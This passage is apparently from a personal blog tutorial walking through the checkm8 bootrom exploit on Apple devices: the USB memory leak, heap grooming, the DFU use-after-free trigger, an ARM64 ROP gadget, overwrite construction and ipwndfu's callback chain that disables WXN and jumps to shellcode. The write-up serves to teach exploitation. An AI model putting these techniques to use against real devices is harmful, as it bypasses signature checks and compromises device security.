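static int needs_zlp(int is_standard_device_request,
                     uint32_t io_length, uint32_t host_wLength)
{
    return is_standard_device_request
        && io_length > 0
        && (io_length % EP0_MAX_PACKET_SIZE) == 0
        && host_wLength > io_length;
}
```

For example, a 0xC0-byte request qualifies when the host asked for 0xC1 bytes, but not when it asked for exactly 0xC0, and a 0xC1-byte request never qualifies since it is not a multiple of 0x40.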

As I said earlier, the usb_quiesce(...) function shuts down the USB Stack, and the endpoints are aborted then stopped (based on the synopsys_otg_abort_endpoint() function).
In this process, it appears that the remaining pending requests are processed as aborted, which triggers the callback of each of them (based on the usb_core_complete_endpoint_io() function).

Based on the slides, once a request completes and meets the conditions we’ve seen earlier, a ZLP should be sent, but in this situation it is queued and never sent, leading to a Memory Leak (the allocation backing the queued ZLP is never freed).

If you combine all of this information, you can easily guess that we have a great attack vector: stalling the IN endpoint to stack up all the requests we need, then triggering a USB Reset to fire the callback of each of them, which queues additional ZLPs that will be leaked.

0x33. Overview

I have talked a lot so far, but at this point we should have a pretty good attack vector and a clear view of what we have to do in order to achieve a full exploit!

This is a really quick overview of the exploitation process; I didn’t detail the Use-After-Free part since it was already explained earlier

In other very brief words, we will have to:

re-shape the heap using the Memory Leak in order to move the io_buffer further away from the former one’s address on the next DFU iteration, creating a hole in which the buffer should be placed: this is the Heap Grooming,
trigger the Use-After-Free vulnerability so the global variables are not reinitialized and, as the next io_buffer will be placed further away from the former one’s address, we can then write to the former address (the one of the freed buffer),
finally, we will have to send a payload that first overwrites the callback and next fields of the usb_device_io_request structure and then points to the patches, allowing us to achieve code execution.

However, there’s still a last issue: the USB limitations.

Because from what I understood, we have to “abuse” the usual USB transfer specifications if we want to trigger the UaF with the “incomplete DATA phase” (because yes, that type of behavior would basically not be allowed in the first place), and there are two ways to do so:

the one used by @littlelailo: which consists of using a “cheap controller” (such as an Arduino or a Raspberry Pi, for example) that allows us to completely control the USB Stack and send packets that would not normally be allowed (such as partial control transfers, etc.),
the one used by @axi0mX: which consists of not using any external controller but, instead, abusing the USB Stack of the host OS, which allows interrupted transfers (but I will talk about this later).

The most used one is the second one, as not everyone can afford such controllers, so I will stick to that one too (that’s the main reason why I stopped following @littlelailo’s exploitation advice from here).

0x34. Heap Grooming

This is the first part of the exploitation: the one that will allow us to prepare everything in order to move the io_buffer further away from its address on the next DFU iteration using the Memory Leak (pretty much the most important one in my opinion).

In order to do so, we have to use a technique that is fairly well known when a Use-After-Free vulnerability is involved: the Heap Grooming.

This part is then used for “tweaking” (either re-shaping or filling) the heap, allowing us to control the flow exactly and be sure of the location of the data we’re about to place in it.

We actually need this part here in order to access the freed io_buffer from the previous iteration of DFU, by creating a hole in which the new io_buffer will be allocated (malloc() would then allocate the io_buffer in the hole we’ve created, since it would likely be more “efficient”).

The Heap is a region of memory used for dynamic memory allocation (for objects like io_buffer for example), you can see it as a small box: similar to how you can place/remove items in and out of a box, there, you can allocate/deallocate memory dynamically, allowing you to manage and use memory as needed during the execution.

If you need more concrete examples, you can check out this article or this video to learn more about this technique.

So, how could we then get to our desired point in there?

On the paper and based on what we’ve seen earlier, we have to:

Stall the IN endpoint of the DEVICE2HOST request,
Send multiple requests that will be queued in the linked list of requests,
Making sure that the two extremities (first and last) of the sent requests are good enough to send a ZLP,
Trigger an usb_reset() so all of these requests will be leaked.

Finally, before triggering the usb_reset(), one last request (which does not meet the requirements to send a ZLP) will be sent in order to update the wLength global variable.

Why? Because each time a request is sent, the wLength global variable is updated to the length of the incoming request.

However, one of the conditions to send a ZLP is that the wLength global variable is bigger than the length of the request being completed, which would not be the case if the last request we sent were itself one that meets the requirements to send a ZLP.

That’s why we have to finish with a request that does not meet the requirements itself, while being bigger than the last request that does.

For example, if we sent 0x81 as the last request, the wLength global variable would be updated to this value, so in the next DFU iteration, every leaked request with a length of 0x80 would have its ZLP sent (as 0x80 < 0x81; these values are only used as an example).
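The wLength reasoning above can be written down as a tiny predicate. This is only a sketch: the comparison against wLength comes from the explanation above, while the “multiple of the packet size” condition and the 0x40 packet size are assumptions I take from the usual USB rule for Zero-Length Packets. The function name is made up.

```python
EP0_MAX_PACKET_SIZE = 0x40  # assumption: 64-byte packets on the control endpoint


def needs_zlp(request_length, last_wlength, packet_size=EP0_MAX_PACKET_SIZE):
    """Return True if a request of `request_length` bytes would end with a ZLP.

    `last_wlength` models the wLength global variable, i.e. the length of the
    most recent request seen by the device.
    """
    fills_whole_packets = request_length % packet_size == 0  # assumed condition
    host_expects_more = last_wlength > request_length        # condition from the text
    return fills_whole_packets and host_expects_more


# Leaked 0x80 requests, with a final 0x81 request updating wLength:
print(needs_zlp(0x80, 0x81))  # the leaked request qualifies for a ZLP
# Same leaked request, but wLength left at 0x80 by a last 0x80 request:
print(needs_zlp(0x80, 0x80))  # no ZLP, wLength is not bigger
# The final 0x81 request itself does not qualify:
print(needs_zlp(0x81, 0x81))
```

With the example values, only the first case returns True, which is why the last request has to be slightly bigger than the leaked ones.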

So, with a simplified drawing, here’s how the heap would be shaped before and after:

Note that the first Leaked Packet is the Stalled IN endpoint because it is actually possible to stall and leak at the same time, which is what we want here (cf. ipwndfu).

However, this is not really what it would look like on some older devices such as the A7/A6/… ones, as “the leak is always triggered for all inflight usb requests” (as @qwertyoruiop said).

So instead, the Heap Grooming would become a Heap Spraying, and would look like this:

Heap Spraying consists of filling the heap with a lot of objects up to a certain point, whereas Heap Grooming consists of re-shaping the heap (both aim to control the heap in order to place data where we want).

0x35. Use-After-Free (Trigger)

Once the Heap Grooming has been executed, the new io_buffer should be allocated somewhere else than its usual address, allowing us to now trigger the Use-After-Free in order to write to the freed io_buffer address from the previous iteration of DFU.

Based on everything we’ve seen since the beginning, here’s what we have to do:

Send a SETUP packet handled by the Interface code (because we will send a DFU_DNLOAD (0x1) request) with a wLength that is smaller than or equal to the io_buffer length (which is 0x800),
Begin the DATA phase but cancel it mid-way (so the global variables will not be cleared),
Send a DFU_ABORT (0x6) request, freeing the io_buffer and making DFU re-enter.
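To visualize the two SETUP packets involved in these steps, here is a minimal sketch that only builds the 8 raw bytes (it does not talk to any device). The 8-byte layout and the 0x21 bmRequestType (host-to-device, class, interface) come from the USB and DFU specifications; the helper name and the zero wValue/wIndex are my own choices for illustration.

```python
import struct

DFU_DNLOAD = 0x1
DFU_ABORT = 0x6
HOST2DEVICE_CLASS_INTERFACE = 0x21  # bmRequestType used by DFU class requests


def setup_packet(bm_request_type, b_request, w_value, w_index, w_length):
    """Pack a USB SETUP packet: two bytes followed by three little-endian u16."""
    return struct.pack("<BBHHH", bm_request_type, b_request, w_value, w_index, w_length)


# DFU_DNLOAD announcing 0x800 bytes of data (the io_buffer length).
dnload = setup_packet(HOST2DEVICE_CLASS_INTERFACE, DFU_DNLOAD, 0, 0, 0x800)
# DFU_ABORT has no DATA phase, so wLength is 0.
abort = setup_packet(HOST2DEVICE_CLASS_INTERFACE, DFU_ABORT, 0, 0, 0)

print(dnload.hex())
print(abort.hex())
```

The wLength field sits in the last two bytes, which is the value the device copies into its global variable before the DATA phase starts.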

One point that has not been mentioned in this post yet is the use of an asynchronous transfer.

We indeed have to send an asynchronous (or non-blocking) transfer with a pretty short timeout, as these transfers are more likely to be interrupted (which is what we need here in order to leave the DATA phase incomplete), whereas synchronous transfers (like libusb_control_transfer(...) for example) are not.

It’s only once we have successfully exited the DATA phase that we can send the DFU_ABORT request in order to shut down the USB Stack and re-enter DFU mode with the UaF triggered.

The short timeout is important because if the operation doesn’t complete within the defined time, the transfer is interrupted and we move on to the next part, leaving the DATA phase incomplete.

At this point of the exploitation, the io_buffer from the new iteration should have been allocated in the hole we’ve created thanks to the Heap Grooming, and the global variables have the values we wanted!

From this moment on, each time we send data to the device, it will be written to the old io_buffer address. Since we can now write to the freed buffer, we can insert a payload in order to try to gain code execution!!
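Here is how I picture the state of the device during this sequence, as a toy Python model. It is a sketch under my own assumptions: the class, the attribute names and the fake addresses are hypothetical, and the model simply assumes that the grooming worked (each iteration gets a new io_buffer address).

```python
class ToyDfu:
    """Toy model of the DFU globals; every name and address is hypothetical."""

    IO_BUFFER_SIZE = 0x800

    def __init__(self):
        self.next_free_addr = 0x1000
        self.freed = set()
        self.io_buffer = None       # buffer owned by the current DFU iteration
        self.data_phase_buf = None  # global: where incoming DATA bytes are written
        self.data_phase_len = 0     # global: bytes still expected (from wLength)
        self.dfu_init()

    def dfu_init(self):
        # Assumption: grooming succeeded, so each iteration gets a new address.
        self.io_buffer = self.next_free_addr
        self.next_free_addr += self.IO_BUFFER_SIZE

    def setup_dnload(self, w_length):
        if w_length <= self.IO_BUFFER_SIZE:
            self.data_phase_buf = self.io_buffer
            self.data_phase_len = w_length

    def data_phase(self, received):
        self.data_phase_len -= received
        if self.data_phase_len == 0:
            self.data_phase_buf = None  # a completed transfer clears the globals

    def abort(self):
        self.freed.add(self.io_buffer)  # io_buffer is freed, globals untouched
        self.dfu_init()                 # DFU re-enters with a new io_buffer


# Exploit path: the DATA phase is interrupted before completion.
dfu = ToyDfu()
old_io_buffer = dfu.io_buffer
dfu.setup_dnload(0x800)
dfu.data_phase(0x40)  # only part of the data arrives
dfu.abort()
stale_target = dfu.data_phase_buf

# Normal path: the DATA phase completes, so nothing dangles after the abort.
clean = ToyDfu()
clean.setup_dnload(0x40)
clean.data_phase(0x40)
clean.abort()

print(hex(stale_target), hex(dfu.io_buffer), clean.data_phase_buf)
```

In the exploit path, the write target still equals the freed address while the new io_buffer lives elsewhere, which is the Use-After-Free.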

I will dedicate a whole GitHub repo to this exploit, with comments for every part of it.

0x36. Payload

This part is in fact composed of two sub-parts: the overwrite and the actual payload itself (I must confess: I peeked at ipwndfu for this part).

The overwrite part contains enough data to overwrite the callback and next fields of a usb_device_io_request structure object, which will redirect the current execution flow to the payload.
And the payload is ARM64 Assembly code that will “simply” apply some patches (patch the USB String of the device to PWNED:[checkm8], apply signature check patches, etc.).

0x361. Overwrite

If you remember, in the part about triggering the Memory Leak, I said this:

In this process, it appears that the remaining pending requests will
be processed as aborted, which will trigger the callback of each of them
(based on the usb_core_complete_endpoint_io() function).

Once this function is executed, each pending request has its callback called and, although I did not mention it, the usb_device_io_request object (the request itself) is then freed and NULLed.

But the fact that the object is freed and NULLed is not a good thing here: since we have overwritten data in the heap, freeing the request would likely hit invalid heap metadata, potentially leading to a panic.

Luckily, this function “only” calls the callback, then frees and NULLs the object, so with some tricks, we can “skip” the freeing part.
This can actually be achieved by restoring the Link Register to the address of the usb_core_complete_endpoint_io(...) function.

The Link Register (also known as LR) is a register (x30 in arm64) that holds the return address, i.e. the address execution jumps back to when the current function returns (it therefore changes every time a function is called).

And restoring a register means giving it back a previously saved value (in this case, the address of the usb_core_complete_endpoint_io(...) function would be stored in the LR register instead of the next instruction address).

Using this technique, we can restore the LR register to the address of the usb_core_complete_endpoint_io(...) function when the callback returns, which skips the freeing of the request and thus avoids the heap corruption that would make the device panic.

Note that we also need to restore the FP (Frame Pointer) register in order to keep a valid Stack Frame and avoid a potential Stack Corruption.

A7/A6/… devices don’t require restoring the LR/FP registers to the usb_core_complete_endpoint_io(...) function as the exploitation method is different (as said earlier, we used Heap Spraying), so I believe that the heap is not corrupted the way it is with Heap Grooming.

Instead, the fields are overwritten with a “typical” exploitation method (meaning that the buffer only contains some random data in order to reach our fields, followed by the payload address that next will point to).

For every other platform, the previous explanation is applied using a ROP gadget:

  
__asm__ __volatile__(
    "ldp x29, x30, [sp, #0x10]\n" // restores x29 (FP) and x30 (LR) from the stack, at SP + 0x10
    "ldp x20, x19, [sp], #0x20\n" // restores x20 and x19 from the SP, then increments the SP by `0x20` bytes (post-index), popping the stack frame
    "ret" // jumps back to the address stored in LR (now `usb_core_complete_endpoint_io(...)` function)
);

Technically, this gadget in itself doesn’t do any major operations, but does enough to achieve the goal of skipping the freeing part of the request!
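To check my understanding of these three instructions, I find it useful to “run” them by hand on a fake stack. The Python sketch below does exactly that: the stack addresses and the saved values are made up for the example, and only the load offsets and the 0x20 post-increment come from the gadget itself.

```python
def run_gadget(regs, stack):
    """Emulate the three instructions of the gadget on a toy register file."""
    sp = regs["sp"]
    # ldp x29, x30, [sp, #0x10]  -> two 8-byte loads at SP + 0x10 and SP + 0x18
    regs["x29"] = stack[sp + 0x10]
    regs["x30"] = stack[sp + 0x18]
    # ldp x20, x19, [sp], #0x20  -> two 8-byte loads at SP, then SP += 0x20
    regs["x20"] = stack[sp]
    regs["x19"] = stack[sp + 0x08]
    regs["sp"] = sp + 0x20
    # ret                        -> branch to the address held in x30 (LR)
    regs["pc"] = regs["x30"]
    return regs


SP = 0x7000  # hypothetical stack pointer
stack = {
    SP + 0x00: 0x2020,       # saved x20 (made-up value)
    SP + 0x08: 0x1919,       # saved x19 (made-up value)
    SP + 0x10: 0x7100,       # saved frame pointer (made-up value)
    SP + 0x18: 0x100004000,  # saved return address (made-up value)
}
regs = run_gadget(
    {"sp": SP, "x19": 0, "x20": 0, "x29": 0, "x30": 0xDEAD, "pc": 0},
    stack,
)
print({name: hex(value) for name, value in regs.items()})
```

Whatever LR contained when the callback was entered (0xDEAD here) is thrown away: execution continues at the return address that was saved in the stack frame, with FP restored alongside it.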

The overwrite should also include the payload address (also called LOAD_ADDRESS in some projects’ configuration).

This address corresponds to the INSECURE_MEMORY_BASE, which is, as I said earlier, the memory location from which the firmware (IMG4 etc.) is later booted; instead of placing an image there, we place the payload.

The address of the INSECURE_MEMORY_BASE for each platform can either be found in the iBoot source code (in memmap.h include files) or by reversing the SecureROM and searching for the platform_mmu_setup(...) function.

Be aware that not every platform sets up the INSECURE_MEMORY_BASE address in this function (this screenshot shows it for the t8010 (A10), but the s5l8960 (A7), for example, does not have it).

At this point, the overwrite part should be done, so the payload should be sent and a USB reset should be triggered as well, processing every cancelled request remaining in the queue and calling their callbacks (which is what we have just seen).
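As a rough illustration of the overwrite described in this part, here is how such a buffer could be assembled in Python. This is a sketch and not the real layout: the padding length, the gadget address and the order of the two fields are placeholders I made up, and only the 0x1800B0000 value is the t8010 INSECURE_MEMORY_BASE used in this post. The real offsets depend on the platform.

```python
import struct

PAYLOAD_ADDRESS = 0x1800B0000           # INSECURE_MEMORY_BASE on t8010
HYPOTHETICAL_GADGET_ADDR = 0x100001234  # placeholder, NOT a real gadget address
HYPOTHETICAL_PADDING_LEN = 0x20         # placeholder distance to the fields


def build_overwrite(padding_len, callback_addr, next_addr):
    """Filler bytes up to the fields, then `callback` and `next` as 64-bit LE."""
    padding = b"\x00" * padding_len
    fields = struct.pack("<2Q", callback_addr, next_addr)
    return padding + fields


overwrite = build_overwrite(
    HYPOTHETICAL_PADDING_LEN,
    HYPOTHETICAL_GADGET_ADDR,  # callback: the gadget that skips the free
    PAYLOAD_ADDRESS,           # next: points to the payload
)
callback, next_ptr = struct.unpack_from("<2Q", overwrite, HYPOTHETICAL_PADDING_LEN)
print(len(overwrite), hex(callback), hex(next_ptr))
```

On the devices using Heap Spraying, the same idea applies without the gadget, since the filler only has to reach the fields.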

0x362. Payload

Our payload should now be loaded at the INSECURE_MEMORY_BASE address. However, for some devices, the execution flow first points to a “callback-chain”, but what is it exactly?

From what I understood, this chain is somehow playing a major role as it sets up a required environment for the exploit to succeed by disabling security features, managing the processor state, memory mappings, and more.

Here’s an example of a callback-chain for the t8010 (A10) platform from ipwndfu:

  
t8010_callbacks = [
    (t8010_dc_civac, 0x1800B0600), # cleaning and invalidating the data cache by virtual address (DC CIVAC)
    (t8010_dmb, 0), # data memory barrier used to ensure that all memory accesses are completed before the next instruction is executed
    (t8010_enter_critical_section, 0),
    (t8010_write_ttbr0, 0x1800B0000), # 0x1800B0000 being the INSECURE_MEMORY_BASE, this will redirect the translation table base register to the shellcode
    (t8010_tlbi, 0), # invalidating the TLB (a cache storing recent virtual-to-physical address translations), ensuring that the new translation table base register is used
    (0x1820B0610, 0), # appears to be the WXN disable function
    (t8010_write_ttbr0, 0x1800A0000), # restoring the translation table base register as the data in the INSECURE_MEMORY_BASE will be overwritten
    (t8010_tlbi, 0), # invalidating the TLB again
    (t8010_exit_critical_section, 0),
    (0x1800B0000, 0), # redirect to shellcode
]

Here, the main purpose was to disable WXN (Write eXecute Never, which makes any writable memory region non-executable) and redirect the execution flow to the shellcode, so that the shellcode can be executed without any issues.

The callback-chain is not needed on every device: it’s only required for A10 and later devices, the others jump directly to the payload address.
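To show why the order of the entries matters, here is a toy Python interpreter for a shortened version of such a chain. It is purely a sketch: the state dictionary, the helper functions and the rule “the shellcode cannot run while WXN is on or the TLB is stale” are my own simplifications; only the two addresses come from the chain above.

```python
SHELLCODE_ADDRESS = 0x1800B0000   # from the chain above
ORIGINAL_TTBR0 = 0x1800A0000      # value restored by the chain above


def write_ttbr0(state, value):
    state["ttbr0"] = value
    state["tlb_stale"] = True  # cached translations no longer match


def tlbi(state, _argument):
    state["tlb_stale"] = False


def disable_wxn(state, _argument):
    state["wxn"] = False


def jump_to_shellcode(state, _argument):
    # Toy rule: writable memory cannot be executed while WXN is still on.
    if state["wxn"] or state["tlb_stale"]:
        raise RuntimeError("shellcode would fault in this toy model")
    state["pc"] = SHELLCODE_ADDRESS


def run_callback_chain(chain, state):
    """Call each (function, argument) pair in order, like the chain does."""
    for function, argument in chain:
        function(state, argument)
        state["trace"].append(function.__name__)
    return state


toy_chain = [
    (write_ttbr0, SHELLCODE_ADDRESS),
    (tlbi, 0),
    (disable_wxn, 0),
    (write_ttbr0, ORIGINAL_TTBR0),
    (tlbi, 0),
    (jump_to_shellcode, 0),
]
state = run_callback_chain(
    toy_chain,
    {"ttbr0": ORIGINAL_TTBR0, "tlb_stale": False, "wxn": True, "pc": 0, "trace": []},
)
print(hex(state["pc"]), state["wxn"], state["trace"])
```

Removing the disable_wxn entry from toy_chain makes the last step raise, which mirrors the reason the chain exists in the first place.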

Finally, the shellcode from ipwndfu is ARM64 Assembly code that will apply some patches to the device.

I won’t detail every line, but rather explain its main parts in order:

Restoring the USB Descriptors, as we damaged them in the heap grooming part,
Overwriting the USB Serial Number with PWNED:[checkm8],
Overwriting the USB request handler (used for the next point),
Handling USB requests and executing custom commands: when the device receives a new request, the new handler (from the 3rd point) checks whether the request’s wValue is equal to 0xffff, which allows executing commands such as memcpy, memset, and exec. Otherwise, the request is handled by the default handler.
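The last point of this list is basically a dispatcher, which can be sketched in a few lines of Python. Everything here is an assumption made for illustration (the request dictionary, the way a command and its arguments are encoded, the fake memory); only the 0xffff check on wValue and the memcpy/memset command names come from the description above, and exec is left out of the toy.

```python
MAGIC_WVALUE = 0xFFFF
memory = bytearray(0x20)  # fake device memory for the toy commands


def cmd_memset(dest, value, length):
    memory[dest:dest + length] = bytes([value]) * length


def cmd_memcpy(dest, src, length):
    memory[dest:dest + length] = memory[src:src + length]


COMMANDS = {"memset": cmd_memset, "memcpy": cmd_memcpy}


def default_handler(request):
    """Stand-in for the original USB request handler."""
    return "default"


def patched_handler(request):
    """Run a custom command on the magic wValue, else fall back to the default."""
    if request["wValue"] != MAGIC_WVALUE:
        return default_handler(request)
    COMMANDS[request["command"]](*request["args"])
    return "custom"


r1 = patched_handler({"wValue": 0xFFFF, "command": "memset", "args": (0, 0x41, 4)})
r2 = patched_handler({"wValue": 0xFFFF, "command": "memcpy", "args": (8, 0, 4)})
r3 = patched_handler({"wValue": 0x0000})
print(r1, r2, r3, bytes(memory[:12]))
```

Keeping the fallback to the default handler is what lets the device keep answering regular DFU requests after it has been patched.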

The shellcode is the part that applies the patches to the device. You can also add your own patches to it if you want to; keep in mind that ipwndfu’s shellcode is just the bare minimum.

Afterwards, your device should be in pwnedDFU mode and you should be able to play with it as much as you want, which also closes this whole article. I hope you’ve learned something from it and that you enjoyed reading it!!

A project summarizing all of this will be made, so this post will be updated as well with a link to it (probably targeting A7 devices as this is the only device I own) :)

0x4. Conclusion

This exploit is really complex (I for sure did not cover every detail, but most of the explanation is here at least) and I realized by the end of this article that I might have picked a really tough subject for my first exploitation post (clown_face.png).

The Use-After-Free vulnerability is a pretty common one, but its exploitation was kind of hard to understand (and to write about), and so was the Memory Leak (which was probably the most complex part here-) because the whole logic is really complex. Above all, I made a mistake by thinking I could understand the exploit without having the basics of exploitation: I was STUPID and WRONG.

That’s why, in order to understand what’s going on (why such thing is doing that and what is that thing and […]), I had to learn pretty quickly the fundamentals of the art of exploitation (what ROP attacks are and how/why to use them, how a stack/heap truly works, how to achieve Stack/Buffer/Heap Overflows, how to properly use GDB/LLDB and know the purpose of registers at runtime, how malloc()/free() work under the hood, …).

I certainly did not cover every detail of the exploit (in particular the most technical ones), but I tried to make it as understandable as possible (and I hope I did it well-).

Anyways, this exploit was a really good example of “real-life vulnerabilities”: it asked for carefulness, patience, a stack of exploitation techniques + a stack of development and a lot of research… but in the end, if you managed to follow until here, you should have gained a bit more knowledge!!

Once again, if I ever said something wrong, please correct me!!

You can follow me on Twitter if you liked this post and you can also support me by looking at my projects on GitHub!

Thank you for your time. ヾ(・ω・*)

0x5. Links

littlelailo’s Gist

qwertyoruiop’s Slides

tihmstar’s PR (interesting)

USB Packets Documentation